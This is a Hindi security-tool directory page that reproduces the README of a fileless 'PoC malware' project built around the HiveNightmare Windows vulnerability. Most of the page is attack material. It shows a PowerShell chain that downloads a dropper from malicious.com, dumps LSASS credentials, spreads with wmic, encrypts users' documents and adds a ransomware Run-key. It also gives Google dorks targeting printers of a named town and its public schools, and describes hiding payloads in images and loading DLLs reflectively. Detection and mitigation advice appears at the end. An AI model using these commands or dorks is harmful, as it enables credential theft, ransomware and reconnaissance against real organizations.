Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Why-so-Serious-SAM — PoC मैलवेयर जो विंडोज 10/11 पर LOLBins के साथ एक फाइललेस रेड टीम विधि का उपयोग करके शैडो कॉपी पर अनुचित ACLs (CVE-2021-36934) के शोषण का उपयोग करता है, स्थानीय NTLM हैश के लिए SYSTEM और SAM हाइव्स निकालता है। | Kitploit
उपकरण/GitHubGitHub/p1rat3r00t/why-so-serious-sam
विशेषाधिकार वृद्धिशोषणपार्श्व आंदोलनपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

PoC मैलवेयर जो विंडोज 10/11 पर LOLBins के साथ एक फाइललेस रेड टीम विधि का उपयोग करके शैडो कॉपी पर अनुचित ACLs (CVE-2021-36934) के शोषण का उपयोग करता है, स्थानीय NTLM हैश के लिए SYSTEM और SAM हाइव्स निकालता है।

11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट

HiveNightmare 'Fileless' Exploit PoC (प्रूफ ऑफ कॉन्सेप्ट):

Screenshot 2025-05-21 001453


विषय सूची

  • अवलोकन
  • विशेषताएँ
  • लैब सिमुलेशन उदाहरण
  • गूगल डॉर्क्स के साथ टोही
  • LOLBins अवलोकन
  • फ़ाइललेस ड्रॉपर एम्बेडिंग
  • प्रिंट स्पूलर और HiveNightmare का शोषण
  • रिफ्लेक्टिव DLL इंजेक्शन
  • MITRE ATT&CK मैपिंग
  • पता लगाना और शमन
  • कानूनी अस्वीकरण
  • संदर्भ और आगे पढ़ना

अवलोकन

CVE-2021-36934/HiveNightmare एक शैक्षिक लाल/बैंगनी टीम अनुसंधान परियोजना है जो Windows 11 पर एक फ़ाइललेस मैलवेयर हमले के ढाँचे का अनुकरण करती है। यह MITRE ATT&CK तकनीकों का उपयोग करके वास्तविक दुनिया के प्रतिपक्षी किल चेन का अनुकरण सक्षम बनाता है, जिसमें गुप्त, फ़ाइललेस संचालन पर ध्यान केंद्रित किया गया है।

चेतावनी: केवल पृथक प्रयोगशालाओं में अनुसंधान और प्रशिक्षण के लिए। उत्पादन या अनधिकृत प्रणालियों पर उपयोग न करें।


विशेषताएँ

  • अंत से अंत तक फ़ाइललेस रैनसमवेयर/वाइपरवेयर हमलों का अनुकरण करता है
  • लिविंग ऑफ द लैंड बाइनरीज़ (LOLBins) के उपयोग का प्रदर्शन करता है
  • क्रेडेंशियल एक्सेस, विशेषाधिकार वृद्धि, पार्श्व गति, और स्थायित्व को प्रदर्शित करता है
  • ब्लू टीम डिटेक्शन अभ्यासों के लिए व्यावहारिक लैब और टोही उदाहरण शामिल करता है
  • MITRE ATT&CK से मैप करता है

लैब सिमुलेशन उदाहरण

निम्नलिखित PowerShell सिमुलेशन बिल्ट-इन विंडोज़ टूल्स (LOLBins) का उपयोग करके एक सामान्य फ़ाइललेस रैनसमवेयर हमले की श्रृंखला प्रदर्शित करता है:

root@kitploit:~
# प्रारंभिक पहुँच: ड्रॉपर लोड करें
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# निष्पादन: इन-मेमोरी पेलोड को डिकोड और लोड करें
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)

# विशेषाधिकार वृद्धि
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# क्रेडेंशियल एक्सेस
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# पार्श्व गति
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# फ़ाइल एन्क्रिप्शन उदाहरण
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# स्थायित्व
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

गूगल डॉर्क्स के साथ टोही

उदाहरण उद्देश्य: मोबर्ली, मिसौरी में सार्वजनिक रूप से उजागर प्रिंटर सेवाओं की पहचान करना, जो PrintNightmare जैसे शोषण के लिए संभावित रूप से असुरक्षित हैं।

नमूना गूगल डॉर्क क्वेरीज़:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

LOLBins अवलोकन

लिविंग ऑफ द लैंड बाइनरीज़ (LOLBins) वैध, भरोसेमंद विंडोज़ बाइनरीज़ हैं जिनका आमतौर पर प्रतिपक्षियों द्वारा सुरक्षा नियंत्रणों को दरकिनार करने और फ़ाइललेस रूप से दुर्भावनापूर्ण कोड चलाने के लिए दुरुपयोग किया जाता है।

उपयोग उदाहरण (प्रिंट सेवा हमला):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

हमलावर rundll32.exe, regsvr32.exe, और powershell.exe जैसे LOLBins का उपयोग नेटवर्क शेयरों से पेलोड निष्पादित करने के लिए करते हैं, अक्सर टोही के माध्यम से उजागर प्रिंटर या सर्वरों की पहचान करने के बाद।


फ़ाइललेस ड्रॉपर एम्बेडिंग

लक्ष्य: छवियों के भीतर संग्रह एम्बेड करके और देशी टूल्स का उपयोग करके उन्हें निकालकर पेलोड को गुप्त रूप से वितरित करना।

चरण:

  1. पेलोड एम्बेड करें:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. निकालें और डिकोड करें:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

यह विधि पारंपरिक फ़ाइल एक्सटेंशन फ़िल्टरिंग को दरकिनार करती है और चोरी-छिपे वितरण के लिए बिल्ट-इन टूल्स का लाभ उठाती है।


रिफ्लेक्टिव DLL इंजेक्शन

तकनीक: रिफ्लेक्टिव लोडिंग का उपयोग करके एक दुर्भावनापूर्ण DLL को सीधे मेमोरी में लोड और निष्पादित करना।

उदाहरण:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

यह डिस्क पर आर्टिफैक्ट छोड़े बिना गुप्त, इन-मेमोरी निष्पादन को सक्षम बनाता है।


MITRE ATT&CK मैपिंग


पता लगाना और शमन

पता लगाना

  • Sysmon + सिग्मा नियम:

    • गैर-सिस्टम DLL लोड करने वाले rundll32.exe की निगरानी करें
    • certutil.exe, regsvr32.exe, mshta.exe के असामान्य उपयोग पर नज़र रखें
    • गैर-प्रशासकों द्वारा शैडो वॉल्यूम एक्सेस को ट्रैक करें
  • SIEM उदाहरण (ELK/Splunk):

    • सार्वजनिक शेयरों से निष्पादन पर अलर्ट
    • पैरेंट/चाइल्ड प्रक्रिया विसंगतियाँ (जैसे, explorer.exe से rundll32.exe उत्पन्न करना)
    • PowerShell या CMD में संदिग्ध एन्कोडेड कमांड

शमन

  • जहाँ आवश्यक न हो वहाँ प्रिंट स्पूलर अक्षम करें:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • सभी सुरक्षा पैच लागू करें और ACL को सख्त करें
  • AppLocker या WDAC के साथ LOLBins को ब्लॉक या प्रतिबंधित करें
  • EDR समाधान का उपयोग करें जो रिफ्लेक्टिव DLL लोडिंग और इन-मेमोरी हमलों का पता लगाते हैं

कानूनी अस्वीकरण

इस रिपॉजिटरी में सभी सामग्री, कोड और तकनीकें केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग के लिए हैं। इस परियोजना के किसी भी भाग का उपयोग नियंत्रित, पृथक वातावरण के बाहर और स्पष्ट अनुमति के बिना न करें। लेखक दुरुपयोग के लिए कोई देयता नहीं मानते।


संदर्भ और आगे पढ़ना

  • LOLOL Farm – LOLBin Playground
  • LOLGEN – Generate LOLBin Chains
  • Detecting SeriousSam
  • DLL Injection Primer
  • Print Spooler Exploit Chain
  • Fileless Malware – Wikipedia
  • PrintSpoofer (Original)
  • HiveNightmare
  • Mitre Attck T1055
  • Hivenightmare demo

सुरक्षित रहें, जिम्मेदारी से अनुसंधान करें, और हमेशा कानूनी और नैतिक तरीके से उपयोग करें।

टूल डाउनलोड करें
चरणतकनीकआईडीविवरण
प्रारंभिक पहुँचवैध खाते / ड्राइव-बाय कॉम्प्रोमाइज़T1078, T1189सार्वजनिक-सामने प्रिंट इंटरफेस से समझौता
निष्पादनDLL साइड-लोडिंग / LOLBinsT1218, T1055.001भरोसेमंद बाइनरीज़ के माध्यम से DLL को रिफ्लेक्टिव रूप से चलाना
विशेषाधिकार वृद्धिप्रिंट स्पूलर शोषण / Hive ACL उल्लंघनT1068, T1003.002सिस्टम-स्तरीय पहुँच और SAM हैश निष्कर्षण
रक्षा चोरीफ़ाइललेस निष्पादन / अस्पष्टीकृत फ़ाइलेंT1027, T1202certutil, mshta आदि के माध्यम से वितरित एन्कोडेड पेलोड
क्रेडेंशियल एक्सेसLSASS डंपिंग / SAM Hive एक्सेसT1003HiveNightmare के बाद क्रेडेंशियल डंपिंग
पार्श्व गतिSMB/नेट शेयर गणनाT1021.002प्रिंटर शेयरों या स्पूलर गणना के माध्यम से फैलना
प्रभावडेटा विनाश / एन्क्रिप्शनT1485, T1486DLL पेलोड के माध्यम से ट्रिगर किया गया फ़ाइललेस वाइपरवेयर